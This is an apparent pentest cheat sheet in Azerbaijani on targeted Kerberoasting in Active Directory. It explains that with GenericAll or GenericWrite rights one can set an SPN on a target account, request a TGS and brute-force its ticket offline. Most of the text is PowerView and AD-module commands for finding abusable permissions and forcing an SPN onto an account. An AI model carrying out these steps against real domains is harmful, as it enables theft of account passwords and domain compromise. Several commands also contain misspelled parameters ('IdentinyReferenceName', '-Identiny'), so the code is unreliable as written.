SPN Service Principal Name üçün qısaldılmışdır. O, Active Directory mühitində hesaba və ya xidmətə unikal şəxsiyyət vermək üçün istifadə edilən identifikatordur. SPN-lər çox vaxt Kerberos autentifikasiya protokolu ilə əlaqələndirilir.
SPN-dən necə istifadə edə bilərik?
Kifayət qədər icazələrimiz varsa (GenericAll/GenericWrite) biz hədəf hesaba SPN təyin edə, TGS tələb edə, sonra onun blobunu tutub bruteforce edə bilərik.
PowerView
#Hesablarda maraqlı icazələri yoxlayın:
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
#Cari istifadəçinin artıq bir SPN təyin edib-etmədiyini yoxlayın
Get-DomainUser -Identity <UserName> | select serviceprincipalname
#Hesabda SPN təyin etməyə məcbur edin:
Set-DomainObject <UserName> -Set @{serviceprincipalname='ops/whatever1'}
AD Module:
#Cari istifadəçinin artıq bir SPN təyin edib-etmədiyini yoxlayın
Get-ADUser -Identity <UserName> -Properties ServicePrincipalName | select ServicePrincipalName
#Hesabda SPN təyin etməyə məcbur edin:
Set-ADUser -Identiny <UserName> -ServicePrincipalNames @{Add='ops/whatever1'}
